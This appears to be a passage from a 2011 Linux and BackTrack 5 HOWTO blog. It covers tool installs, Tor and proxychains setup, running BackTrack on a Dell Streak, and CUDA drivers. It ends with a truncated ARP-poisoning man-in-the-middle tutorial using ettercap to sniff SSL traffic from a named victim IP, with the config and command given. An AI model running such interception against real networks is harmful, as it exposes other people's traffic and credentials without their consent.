*** Make sure you have a directory /tftpboot.

That's all! See you.

HOWTO : Anonymous in chat.freenode.net with XChat

2011-08-04T15:34:00.006+08:00

IRC will display your IP address to other users that online. However, you can hide it by using IRC Proxy or Bouncer.

PART I - MY-BNC.NET

First of all, go to My-BNC.net to register an account. For example, the username is android and password is androidpass. Then, login with your username and password that registered before.

Step 1 :

Go the the menu on the browser, choose "Setting" to setup your account.

(a) Server setting

ssl = on 

port = 7000

server = chat.freenode.net

password = <Do not require>

vhost = my-bnc.net

perform 1 = JOIN #<Your Channel>

(b) User setting

Realname = My-BNC User

Nickname = android

Password = androidpass



Profile = Private

Auth name = android

Auth password = androidpass

Auto-auth = on

PART II - XCHAT AND ZNC

Step 2 :

sudo apt-get update

sudo apt-get install znc xchat

Step 3 :

znc --makeconf

[ ** ] Building new config

[ ** ] 

[ ** ] First lets start with some global settings...

[ ** ] 

[ ?? ] What port would you like ZNC to listen on? (1 to 65535): 6697

[ ?? ] Would you like ZNC to listen using SSL? (yes/no) [no]: yes

[ ** ] Unable to locate pem file: [/home/samiux/.znc/znc.pem]

[ ?? ] Would you like to create a new pem file now? (yes/no) [yes]: 

[ ?? ] hostname of your shell (including the '.com' portion): irc.my-bnc.net

[ ok ] Writing Pem file [/home/samiux/.znc/znc.pem]... 

[ ?? ] Would you like ZNC to listen using ipv6? (yes/no) [no]: 

[ ?? ] Listen Host (Blank for all ips): 

[ ** ] 

[ ** ] -- Global Modules --

[ ** ] 

[ ?? ] Do you want to load any global modules? (yes/no): yes



[ ** ] And 10 other (uncommon) modules. You can enable those later.

[ ** ] 

[ ?? ] Load global module <partyline>? (yes/no) [no]: 

[ ?? ] Load global module <webadmin>? (yes/no) [no]: yes

[ ** ] 

[ ** ] Now we need to setup a user...

[ ** ] 

[ ?? ] Username (AlphaNumeric): android

[ ?? ] Enter Password: androidpass

[ ?? ] Confirm Password: androidpass

[ ?? ] Would you like this user to be an admin? (yes/no) [yes]: 

[ ?? ] Nick [android]: 

[ ?? ] Alt Nick [android_]: 

[ ?? ] Ident [android]: 

[ ?? ] Real Name [Got ZNC?]: 

[ ?? ] VHost (optional): 

[ ?? ] Number of lines to buffer per channel [50]: 500

[ ?? ] Would you like to keep buffers after replay? (yes/no) [no]: 

[ ?? ] Default channel modes [+stn]: 

[ ** ] 

[ ** ] -- User Modules --

[ ** ] 

[ ?? ] Do you want to automatically load any user modules for this user? (yes/no): yes



[ ** ] And 33 other (uncommon) modules. You can enable those later.

[ ** ] 

[ ?? ] Load module <admin>? (yes/no) [no]: yes

[ ?? ] Load module <chansaver>? (yes/no) [no]: yes

[ ?? ] Load module <keepnick>? (yes/no) [no]: yes

[ ?? ] Load module <kickrejoin>? (yes/no) [no]: 

[ ?? ] Load module <nickserv>? (yes/no) [no]: 

[ ?? ] Load module <perform>? (yes/no) [no]: 

[ ?? ] Load module <simple_away>? (yes/no) [no]: yes

[ ** ] 

[ ** ] -- IRC Servers --

[ ** ] 

[ ?? ] IRC server (host only): freenode    

[ ?? ] [freenode] Port (1 to 65535) [6667]: 7000

[ ?? ] [freenode] Password (probably empty): 

[ ?? ] Does this server use SSL? (probably no) (yes/no) [no]: yes

[ ** ] 

[ ?? ] Would you like to add another server? (yes/no) [no]: 

[ ** ] 

[ ** ] -- Channels --

[ ** ] 

[ ?? ] Would you like to add a channel for ZNC to automatically join? (yes/no) [yes]: yes

[ ?? ] Channel name: <Your Channel>

[ ?? ] Would you like to add another channel? (yes/no) [no]: 

[ ** ] 

[ ?? ] Would you like to setup another user? (yes/no) [no]: 

[ ok ] Writing config [/home/samiux/.znc/configs/znc.conf]... 

[ ** ] 

[ ** ] To connect to this znc you need to connect to it as your irc server

[ ** ] using the port that you supplied.  You have to supply your login info

[ ** ] as the irc server password like so... user:pass.

[ ** ] 

[ ** ] Try something like this in your IRC client...

[ ** ] /server  6697 android:<pass>

[ ** ] 

[ ?? ] Launch znc now? (yes/no) [yes]: 

[ ok ] Opening Config [/home/samiux/.znc/configs/znc.conf]... 

[ ok ] Binding to port [+6697] using ipv4... 

[ ** ] Loading user [samiux]

[ ok ] Loading Module [admin]... [/usr/lib/znc/admin.so]

[ ok ] Loading Module [chansaver]... [/usr/lib/znc/chansaver.so]

[ ok ] Loading Module [keepnick]... [/usr/lib/znc/keepnick.so]

[ ok ] Loading Module [simple_away]... [/usr/lib/znc/simple_away.so]

[ ok ] Adding Server [freenode +7000]... 

[ ok ] Loading Global Module [webadmin]... [/usr/lib/znc/webadmin.so]

[ ok ] Forking into the background... [pid: 9141]

[ ** ] ZNC 0.092+deb3 - http://znc.sourceforge.net

*** In case, you make a mistake and want to re-generate the config file. You should delete the "znc.conf" under "/home/<Your name>/.znc".

rm -R .znc

Step 4 :

Open XChat. Under the "Network List" window :

User Information

Nickname : android

Second choice : android_

Third choice : android__

User name : android

Real name : Android

Press "Add" button on the right. Then name it to "My-BNC BNC" and highlight it. Choose "Edit", on the top big box change to "irc.my-bnc.net/6697".

Only connect to chosen network : enable

Auto connect to this network : enable



Username : android



Use SSL for all servers in this networks : enable

Accept invalid certificate : enable



Server password : androidpass

Step 5 :

Choose "Connect" on the XChat window.

That's all! See you.

HOWTO : Yet Another Update script for Back|Track 5

2011-07-30T10:12:00.002+08:00

Maxfx at Back|Track Linux developed a script for updating the Back|Track 5 which is written in Python. You can update the Back|Track 5 and it's applications in one script.

The current version is 0.6 at the time of this writing.

wget http://bl4ck5w4n.tk/wp-content/uploads/2011/07/bt5up.tar

tar -vxf bt5up.tar

Usage :

./bt5up.py

You can also move the execute file to /bin or /usr/bin. Once moved the file to /bin or /usr/bin, you can run the script as the following :

bt5up.py

Source :

Yet Another Update script on Back|Track 5 forum

Remarks :

Another update script written in C

That's all! See you.

HOWTO : Register to OSVDB and Nessus on Back|Track 5

2011-07-24T10:12:00.005+08:00

PART I : OSVDB

Go to http://osvdb.org to register your account and you will receive an email to activate your account.

After the activation your account, you can login to OSVDB. Go to "Account" -- "API" to copy the API code.

Open a terminal, issue the following command :

nano /pentest/enumeration/web/cms-explorer/osvdb.key

Copy the API code onto the osvdb.key file.

PART II : Nessus

Go to http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code and select "Using Nessus at Home?" to register.

You will receive an email. Follows the instruction on the email to open a terminal and issue the command :

/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX

To create a user :

/opt/nessus/sbin/nessus-adduser

** You can leave the rule field empty.

Start the Nessus from the menu of Back|Track 5, "BackTrack" -- "Vulnerability Assessment" -- "Vulnerability Scanners" -- "Nessus" -- "nessus start".

Or, just issue the following command :

/etc/init.d/nessusd start

After that, go to https://localhost:8834/

That's all! See you.

HOWTO : Solves the Wireshark not loading on Back|Track 5

2011-07-24T02:29:00.007+08:00

Back|Track 5 comes with Wireshark 1.6.1 as at July 24, 2011 (GMT +8) However, it does not load properly due to missing a file namely "libwsutil.so.0".

Therefore, we need to compile the latest SVN version of Wireshark from source. The current SVN version is 1.7.0-SVN-38173 at time of this writing.

Step 1 :

Go http://www.wireshark.org/download/automated/src/ to get the latest version of the Wireshark. The latest version at the time of this writing is 1.7.0-SVN-38173.

*** Please note that the latest version as at July 25, 2011 is 1.7.0-SVN-38202.

apt-get update

apt-get install libtool flex libgtk2.0-dev lua50

apt-get install dpatch libc-ares-dev docbook-xsl libpcre3-dev libcap-dev libgnutls-dev libkrb5-dev liblua5.1-0-dev libsmi2-dev libgeoip-dev xsltproc automake1.9

Step 2 :

~~apt-get --purge remove wireshark~~

** Don't need to remove the previous wireshark. So that the menu entry can be reminded unchanged.

Step 3 :

tar -xvjf wireshark-1.7.0-SVN-<LATEST_VERSION>.tar.bz2

cd wireshark-1.7.0-SVN-<LATEST_VERSION>

Step 4 :

./autogen.sh

./configure

make debian-package

Step 5 :

cd ..

If you are installed 64-bit Back|Track 5 :

dpkg -i wireshark-common_1.7.0_amd64.deb wireshark_1.7.0_amd64.deb tshark_1.7.0_amd64.deb

OR

If you are installed 32-bit Back|Track 5 :

dpkg -i wireshark-common_1.7.0_i386.deb wireshark_1.7.0_i386.deb tshark_1.7.0_i386.deb

Step 6 :

/usr/bin/wireshark

That's all! See you.

HOWTO : Back|Track 5 on Lenovo ThinkPad X100e

2011-07-15T09:06:00.004+08:00

Lenovo ThinkPad X100e (Type 3508-65B) is equipped with AMD Athlon Neo MV-40 CPU and Radeon Display card. It does not work properly on Back|Track 5.

This tutorial is going to show you how to install Back|Track 5 on the captioned hardware.

Step 1 :

Boot up the Live CD or Live USB. Select the first item. Press "Tab" key to add the following line to the end of the line displayed on the screen.

radeon.modset=0

Step 2 :

After the Live CD or Live USB is booting up, open terminal and then issue the following command.

nano /etc/default/grub

Locate :

GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791"

Make it read as :

GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791 radeon.modset=0"

Save and exit.

Step 3 :

update-grub
fix-splash

Step 4 :

Configure the wireless card.

HOWTO : RTL8191SE wireless card on Back|Track 4 R2

Step 5 :

Install of AMD Catalyst 11.6 Proprietary driver.

Go to AMD official site and download AMD Catalyst 11.6 Proprietary Linux x86 Display Driver which is released on June 15, 2011.

wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-6-x86.x86_64.run

chmod +x ati-driver-installer-11-6-x86.x86_64.run

./ati-driver-installer-11-6-x86.x86_64.run

** My Back|Track 5 is 64-bit so I download the 64-bit version of the driver.

Follow the instruction on the screen to install the driver. After the installation, you should reboot your system.

Before reboot your system, issue the following command :

fix-splash

Step 6 :

Install Pointing Device Settings for the TrackPoint system.

apt-get install gpointing-device-settings

Go to "System" -- "Preferences" -- "Pointing Devices".

Select "TPPS/2 IBM TrackPoint". Choose "Use middle button emulation" and "Use wheel emulation". Select "2" for the button.

That's all! See you.

HOWTO : Adobe Flash 10.3 on Back|Track 5

2011-07-15T08:34:00.002+08:00

Step 1 :

Go to Flash official site to download current version (tar.gz). It is 10.3.181.34 at the time of this writing.

Step 2 :

Close all running Firefox.

Extract the file "install_flash_player_10_linux.tar.gz".

tar -xvzf install_flash_player_10_linux.tar.gz

Step 3 :

Move the "libflashplayer.so" to its locations.

chown root:root libflashplayer.so

chmod 0644 libflashplayer.so

mv -f libflashplayer.so /usr/lib/mozilla/plugins/

ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/

Step 4 :

Delete the extracted files and directories.

rm -R usr

Source :

Backtrack 5 - How to get flash player working on Gnome / KDE x64

That's all! See you.

HOWTO : Update script for Back|Track 5

2011-07-14T15:50:00.003+08:00

Sickness at Back|Track Linux developed a script for updating the Back|Track 5. You can update the Back|Track 5 and it's applications in one script.

The current version is 0.6 at the time of this writing.

wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.c

gcc -o backtrack5_update backtrack5_update.c

Usage :

./backtrack5_update

You can also move the execute file to /bin. Once moved the file to /bin, you can run the script as the following :

backtrack5_update

Source :

Update script on Back|Track 5 forum

Remarks :

Another update script written in Python

That's all! See you.

HOWTO : FeedingBottle 3.2 on Back|Track 5

2011-07-14T13:21:00.004+08:00

FeedingBottle is a Graphic User Interface (GUI) for Aircrack-ng and it is a project of Beini. Beini is based on Tiny Core Linux which is a wireless network security testing system.

FeedingBottle can handle WEP, WPA, WPA2 as well as hidden SSID.

FeedingBottle 3.2 is working well on Back|Track 5. You can download it at here. Extact and install it by the following commands.

wget http://www.ibeini.com/beini_system/others/feedingbottle/feedingbottle3.2-backtrack5-gnome.zip

unzip feedingbottle3.2-backtrack5-gnome.zip

dpkg -i feedingbottle3.2-backtrack5-gnome.deb

After the installation, you can find it at "Applications" -- "BackTrack" -- "Exploitation Tools" -- "Wireless Exploitation Tools" -- "WLAN Exploition" -- "FeedingBottle3.2".

For the usage, please visit the official site at here.

There are simple and advanced modes for you to use.

That's all! See you.

HOWTO : The Onion Router (Tor) on Back|Track 5

2011-07-11T23:08:00.009+08:00

PART I : Browser

Step 1 :

nano /etc/apt/sources.list

Append the following line to the file.

deb http://deb.torproject.org/torproject.org lucid main

Step 2 :

gpg --keyserver keys.gnupg.net --recv 886DDD89

gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -



apt-get update

apt-get install tor tor-geoipdb

apt-get install privoxy

Step 3 :

nano /etc/privoxy/config

Append the following line :

forward-socks4a / 127.0.0.1:9050 .

/etc/init.d/privoxy start

/etc/init.d/tor start

Step 3a (Optional) :

If you are behind firewall or NAT as well as router, you should append the following line at the configure file.

forward 192.168.*.*/ .

Step 4 :

Go to the Tor official site to download and install Tor button for Firefox.

Tor Button Plugin for Firefox

Step 5 :

Open Firefox. Go to "Tools" -- "Add-ons" -- "Extensions". Select "Torbutton's Preferences".

(a) At "Proxy Settings", unclick "Use Polipo".
(b) At "Security Settings", On browser startup, set Tor state to:" select "Tor".
(c) At "Display Settings", select "Icon".

** Now, your Firefox will enable Tor on every launch unless you disabled the "Tor Button" on the Firefox.

Step 6 (Optional) :

To check if it works or not. Go to the following sites to check your Ip address.

http://cmyip.com

or

http://whatismyip.com

or

http://check.torproject.org

PART II : Console

Step a :

apt-get install proxychains elinks

Step b :

nano /etc/proxychains.conf

Append the following line :

socks4 127.0.0.1 9050

** It should be there.

Step c :

Usage :

proxychains nmap google.com

proxychains elinks http://cmyip.com

proxychains elinks http://www.whatismyip.com

To see your real IP address :

elinks cmyip.com

That's all! See you.

HOWTO : Lenovo Active Protection System (HDAPS) on Ubuntu 11.04

2011-07-11T22:47:00.002+08:00

HDAPS can protect against your laptop (Lenovo ThinkPad) from damaging the hard drive when the laptop is moving around.

Step 1 :

sudo apt-get update

sudo apt-get install tp-smapi-dkms hdapsd

Step 2 :

echo 'tp_smapi' | sudo tee -a /etc/modules

echo 'hdapsd' | sudo tee -a /etc/modules

Step 3 :

sudo modprobe tp_smapi

sudo /etc/init.d/hdapsd restart

** You just do Step 1 to Step 3 for one time only

Step 4 :

To test if the hdapsd is working or not, you just issue one of the following commands :

(a)
sudo find /

Then, move your laptop and to see if it can halt or not.

(b)
sudo hdapsd

Then, move your laptop and to see if it display "parking" or not.

Step 5 (Optional) :

You can adjust the sensitivity of the sensor by editing the following :

sudo nano /etc/default/hdapsd

Locate "SENSITIVITY" and adjust the value.

That's all! See you.

HOWTO : Yet Another Back|Track 5 on Dell Streak 5

2011-07-03T11:25:00.004+08:00

I wrote a tutorial for Back|Track 5 on Dell Streak 5 with StreakDroid at here. Today, I would like to show you how to use SimpleStreak instead of StreakDroid.

Why use SimpleStreak? It is because SimpleStreak uses Official ROM with StreakDroid kernel. It is less bug comparing with StreakDroid. Furthermore, SimpleStreak is faster than StreakDroid.

The current version of SimpleStreak is 1.2 at the time of this writing. You can download it at here.

PART I - INSTALLATION OF SIMPLESTREAK

Step 1 :

First of all, you should make sure you have flashed StreakMod Recovery. You can download it (MultiRecovryFlasher.v0.7.rar at the time of this writing) at here.

Step 2 :

Download SimpleStreak 1.2 at here.

Rename it to update.zip and copy it to the root directory of the SD Card of your Streak.

Step 3 :

Switch off your Streak. Long press "Vol Up" + "Vol down" and then press "Power on". Long press those keys until you see the screen is boot up to recovery mode.

Select "2. Software upgrade via Update.pkg on SD Card" by pressing "Camera button". You will see a "Dell" logo and a "!" inside a triangle. Press "Power on" to the next menu.

Press "Vol up" or "Vol down" to move the cursor. Select "wipe the cache partition" and "wipe data/factory reset" by pressing "Camera button" one by one.

After that, press "Vol up" or "Vol down" to move the cursor. Select "sdcard:update.zip" by pressing "Camera button". Then choose, "Install".

Upon seeing "Installation Completed", press "Exit" button on the Streak to return to the previous menu. Then select "reboot system now".

Wait for the Streak to reboot. The first reboot takes longer time. Please be patient.

Step 4 :

Install the following apps from the Market for the running of Back|Track 5.

(1) Android Terminal Emulator by Jack Palevich
(2) Mocha VNC Lite by MochaSoft

** Step 1 to 4, just do them ONCE.

PART II - INSTALL BACK|TRACK 5 ON DELL STREAK

Step 5 :

Download the official Back|Track 5 ARM from the official site. Extract it and copy "busybox" and "installbusybox.sh" to the root directory of the SD card.

Open the Android Terminal Emulator and then execute

su

sh installbusybox.sh

** This step is just doing ONCE unless your ROM is reflashed or updated.

Step 6 :

Since the original ARM version of Back|Track 5 cannot be copied to the SD Card due to the size of the image larger than 4GB. You should download a resized version which is developed by anantshri.

bt.7z.001
bt.7z.002
bt.7z.003

MD5SUM :
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001
247842fd0d3ebb39454f76f4704d1537 bt.7z.002
f74d2f744434a7182b13287d9f8165e7 bt.7z.003

Step 7 :

Double click on "bt.7z.001" to extract. You will then see the following after the extract.

bt

bt.img

startbt

stopbt

installbt.sh

You should create a directory of "bt" (or folder) on the SD Card's root directory.

Copy these files to "/sdcard/bt".

Step 8 :

Run the following commands on the Terminal Emulator on your Streak.

su

cd /sdcard/bt

sh installbt.sh

** This step is just doing ONCE unless your ROM is reflashed or updated.

Step 9 :

Run the following commands on the Terminal Emulator on your Streak.

To start the Back|Track 5 :

su

startbt

bt

Then, you will drop to the Back|Track shell

Step 10 :

Under the Back|Track shell, run the following :

ui

** It will start the VNC server on your Streak.

Step 11 :

Press "Home" on your Streak and then run the apps "Mocha VNC Lite".

Name : BackTrack (or bt for short)

Address : localhost

Port : 5901

Password : 12345678

Then, press "Connect". You will see the Back|Track 5 launched.

** The setting of the Mocha VNC Lite will be remembered. That means you just type ONCE.

Press "Home" to go to the Streak screen. Back|Track 5 is still running.

Step 12 :

To stop the Back|Track 5, run the following command on the Back|Track shell :

killui

** Stop the VNC server.

And then, run the following command :

Exit the Terminal Emulator and then restart it.

su

stopbt

Now, the Back|Track 5 is stopped running.

Step 13 :

To launch the Back|Track next time, you should repeat the Step 9 to 11. And stop the Back|Track just repeat Step 12.

Source :

BACKTRACK 5 on Xperia X10 chroot

Streak - MultiRecoveryFlasher

The method of resize the Back|Track 5 image to 3.3GB

Remarks :

(1) Make sure you run "killui" and "stopbt" when BackTrack 5 is not required.

(2) The aircrack-ng cannot be ran properly as the interface is eth0 instead of wlan0. No monitor mode and no injection.

(3) Download MultiRecoveryFlasher at the Source above. Then, flash "StreakMod-Recovery" if you cannot flash the SimpleStreak. Under Ubuntu, you are not required to install any driver but you need to run the program in root. Go to root by the following command :

sudo -sH

That's all! See you.

Does Snort really protect your network?

2011-07-02T10:11:00.001+08:00

Before watching the video below which is prepared by TOX1C, I always think that Snort is powerful and protective. Now, I know that Snort cannot protect your network from being hacked by skilled hackers.

Enjoy!

Pissing on Snort with Metasploit from T0X1C on Vimeo.

HOWTO : Back|Track 5 on Dell Streak 5

2011-06-01T13:33:00.029+08:00

First of all, you should root your Dell Streak 5. I have tried many methods to root my Dell Streak 5 but unsuccess. Those methods require Windows system and some require to use an apps. I nearly to brick my Streak. Fortunately, I re-flashed the recovery image and rescued my Streak.

Now, I would like to show you how to root your Streak by mean of installation of a custom ROM - StreakDroid which is developed by DJ Steve. The current StreakDroid is 2.0.0 and based on stock ROM 2.3.3. However, this version has some bugs (please see Known Issue below). Therefore, I use the previous version 1.9.0 which is based on stock ROM 2.2.2 instead. Version 1.9.0 is more stable then 2.0.0.

Installation of custom ROM for the root is the easiest way to do so. If you do so, your Streak cannot be unrooted and the warranty will be voided. The ROM will be the StreakDroid 2.0.0 or 1.9.0 depends on your choice.

Installation of Back|Track 5 does not harm your Streak as it use VNC to load the Back|Track 5 image.

PART I - INSTALL CUSTOM ROM TO DELL STREAK

Step 1 :

Download the StreakDroid 2.0.0.
wget http://mirror2.streakdroid.com/StreakDroid5-2.0.zip

OR

Dowload the StreakDroid 1.9.0.
wget http://downloads.streakdroid.com/djsteve/update-1.9.0.zip

Rename it to update.zip and copy it to the SD card of your Streak.

Step 2 :

Switch off your Streak. Long press "Vol Up" + "Vol down" and then press "Power on". Long press those keys until you see the screen is boot up to recovery mode.

Select "2. Software upgrade via Update.pkg on SD Card" by pressing "Camera button". You will see a "Dell" logo and a "!" inside a triangle. Press "Power on" to the next menu.

Press "Vol up" or "Vol down" to move the cursor. Select "wipe the cache partition" and "wipe data/factory reset" by pressing "Camera button" one by one.

After that, press "Vol up" or "Vol down" to move the cursor. Select "sdcard:update.zip" by pressing "Camera button". Then choose, "Install".

Upon seeing "Installation Completed", press "Exit" button on the Streak to return to the previous menu. Then select "reboot system now".

Wait for the Streak to reboot. The first reboot takes longer time. Please be patient.

Step 3 (Optional) :

You can now to install the following apps from the Market.

(1) sysctl config
(2) chainfire3D
(3) Plugins for chainfire3D - (Don't extract the .zip) Installed and select nNvidia
(4) Remote Desktop by Kolakowski Damian

Step 4 :

Install the following apps from the Market for the running of Back|Track 5.

(1) Android Terminal Emulator by Jack Palevich
(2) Android-VNC-Viewer by androidVNC team + antlersoft
Or, (3) Mocha VNC Lite by MochaSoft

** Step 1 to 4, just do them ONCE.

PART II - INSTALL BACK|TRACK 5 ON DELL STREAK

Step 5 :

Since the original ARM version of Back|Track 5 cannot be copied to the SD Card due to the size of the image larger than 4GB. You should download a resized version which is developed by anantshri.

bt.7z.001
bt.7z.002
bt.7z.003

MD5SUM :
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001
247842fd0d3ebb39454f76f4704d1537 bt.7z.002
f74d2f744434a7182b13287d9f8165e7 bt.7z.003

Step 6 :

Double click on "bt.7z.001" to extract. You will then see the following after the extract.

bt

bt.img

startbt

stopbt

installbt.sh

You should create a directory of "bt" (or folder) on the SD Card's root directory.

Copy these files to "/sdcard/bt".

Step 7 :

Run the following commands on the Terminal Emulator on your Streak.

su

cd /sdcard/bt

sh installbt.sh

** This step is just doing ONCE unless your ROM is reflashed or updated.

Step 8 :

Run the following commands on the Terminal Emulator on your Streak.

To start the Back|Track 5 :

startbt

bt

Then, you will drop to the Back|Track shell

Step 9 :

Under the Back|Track shell, run the following :

ui

** It will start the VNC server on your Streak.

Step 10 :

Press "Home" on your Streak and then run the apps "Android-VNC-Viewer".

Nick : BackTrack (or bt for short)

Address : localhost

Port : 5901

Password : 12345678

Color Format : 24-bit color (4 bpp)

Local mouse pointer : Enable

Force full-screen bitmap : Auto

Then, press "Connect". You will see the Back|Track 5 launched.

** The setting of the Android-VNC-Viewer will be remembered. That means you just type ONCE.

Press "Home" to go to the Streak screen. Back|Track 5 is still running.

Step 11 :

To stop the Back|Track 5, run the following command on the Back|Track shell :

killui

** Stop the VNC server.

And then, run the following command :

Exit the Terminal Emulator and then restart it.

stopbt

Now, the Back|Track 5 is stopped running.

Step 12 :

To launch the Back|Track next time, you should repeat the Step 8 to 10. And stop the Back|Track just repeat Step 11.

Source :

xda developers - Dell Streak

BACKTRACK 5 on Xperia X10 chroot

HOWTO : Root the Dell Streak (Updated 2010-Dec-13) -- at your own risk

Streak - MultiRecoveryFlasher

The method of resize the Back|Track 5 image to 3.3GB

Known issues :

StreakDroid 2.0.0 -
Since Dell Streak will reboot or reset itself on every an hour or 1.5 hours, please install an apps namely "Super Task Killer" by OPDA Team and make it runs automatically when the Streak start up. Set it to kill the background apps on every half an hour interval. That MAY solve the problem as mentioned.

StreakDroid 1.9.0 -
The Android keyboard is malfunction but use Swype instead.

Remarks :

(1) Make sure you run "killui" and "stopbt" when BackTrack 5 is not required.

(2) The aircrack-ng cannot be ran properly as the interface is eth0 instead of wlan0. No monitor mode and no injection.

(3) SecManiac.com stated that an apps namely "ASTRO file manager" can extract the BackTrack 5 ARM image to the SD card that in fat32 format flawlessly. However, it does not test by me.

(4) Download MultiRecoveryFlasher at the Source above. Then, flash "StreakMod-Recovery" if you cannot flash the StreakDroid. Under Ubuntu, you are not required to install any driver but you need to run the program in root. Go to root by the following command :

sudo -sH

That's all! See you.

HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Server

2011-05-29T23:29:00.000+08:00

The CUDA Toolkit 4.0 is released on May 2011. If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA Toolkit 4.0 on Ubuntu 11.04 Server.

You will experience a more faster server after the installation of CUDA Toolkit 4.0.

This HOWTO does not require to install X.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Thanks for the developer of CUDA 4.0 PPA - Aaron Haviland of his contribution to make CUDA Toolkit to be installed easily.

Step 2 :

sudo apt-get update

sudo apt-get upgrade

64-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

Step 3 :

sudo nano /etc/init.d/nvidia_cuda

Append the following lines.

============= Copy from here ================

#!/bin/bash



PATH=/sbin:/bin:/usr/bin:$PATH



/sbin/modprobe nvidia



if [ "$?" -eq 0 ]; then



   # Count the number of NVIDIA controllers found.

   N3D=`/usr/bin/lspci | grep -i NVIDIA | grep "3D controller" | wc -l`

   NVGA=`/usr/bin/lspci | grep -i NVIDIA | grep "VGA compatible controller" | wc -l`



   N=`expr $N3D + $NVGA - 1`

   for i in `seq 0 $N`; do

      /bin/mknod -m 666 /dev/nvidia$i c 195 $i;

   done



   /bin/mknod -m 666 /dev/nvidiactl c 195 255



else

   exit 1

fi

=========== Copy to here =================

Step 4 :

sudo chmod +x /etc/init.d/nvidia_cuda
sudo update-rc.d nvidia_cuda defaults

Step 5 :

Reboot your system.

Remarks

I do not have nVidia display cards server in hand at the moment, I am not sure the captioned startup script working properly or not.

That's all! See you.

HOWTO : nVidia CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop

2011-05-29T23:24:00.001+08:00

The CUDA Toolkit 4.0 is released on May 2011. If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA Toolkit 4.0 on Ubuntu 11.04 Desktop.

You will experience a more faster desktop after the installation of CUDA Toolkit 4.0. Meanwhile, if you installed SMPlayer, you can playback 1080p videos with the help of vdpau.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Thanks for the developer of CUDA 4.0 PPA - Aaron Haviland of his contribution to make CUDA Toolkit to be installed easily.

Step 2 :

sudo apt-get update

sudo apt-get upgrade

64-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

Step 2a (Optional) :

If you do not have any nVidia driver installed before or you encounter any problem of booting up your system, you need to do the following command. Otherwise, this step is not required at all.

sudo nvidia-xconfig

**This step may not be required.

Step 3 :

Reboot your system.

Step 4 (Optional) :

To install SMPlayer.

sudo apt-get install smplayer smplayer-translations smplayer-themes

Then set it to use "vdpau" at "Output Driver" at "Preference".

Step 5 (Optional) :

Once installed the CUDA Toolkit and nVidia drivers, you can download the sample codes for testing.

sudo apt-get install freeglut3-dev libxi-dev libXmu-dev

wget http://developer.download.nvidia.com/compute/cuda/4_0/sdk/gpucomputingsdk_4.0.17_linux.run

sudo chmod +x gpucomputingsdk_4.0.17_linux.run

./gpucomputingsdk_4.0.17_linux.run

Accept the default settings.

cd NVIDIA_GPU_computing_SDK/C

make

** Please ignore the warning messages for unsupported gcc version. That is no harm at all.

Run the sample codes.

cd NVIDIA_GPU_computing_SDK/C/bin/linux/release

./deviceQuery

./nbody

That's all! See you.

HOWTO : Sniffing SSL with ettercap on Back|Track 5

2011-05-28T01:34:00.003+08:00

*** WARNING : This HOWTO is for educational only.  Do NOT carry out the following steps on a LAN that without permission. Otherwise, you will be put into the jail. ***

Sniffing SSL (https) traffic on LAN with ettercap by mean of Man In The Middle (MITM) attack.

Step 1 :

nano /etc/etter.conf

Make the change as the following :

[privs]

ec_uid = 0    # nobody is the default

ec_gid = 0    # nobody is the default

Uncomment the following :

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Step 2 :

Victim's machine is at 192.168.1.100 while the router is at 192.168.1.1. Attacker is at 192.168.1.115.

ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/

The outcome of the display is as the following :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA



Dissector "dns" not supported (etter.conf line 72)

Listening on eth0... (Ethernet)



eth0 ->    08:00:27:FF:95:DB    192.168.1.115     255.255.255.0



Privileges dropped to UID 0 GID 0...



  28 plugins

  39 protocol dissectors

  53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services



Scanning for merged targets (2 hosts)...



* |=================================================>| 100.00 %



2 hosts added to the hosts list...



ARP poisoning victims:



GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A



GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2

Starting Unified sniffing...





Text only Interface activated...

Hit 'h' for inline help

Step 3 :

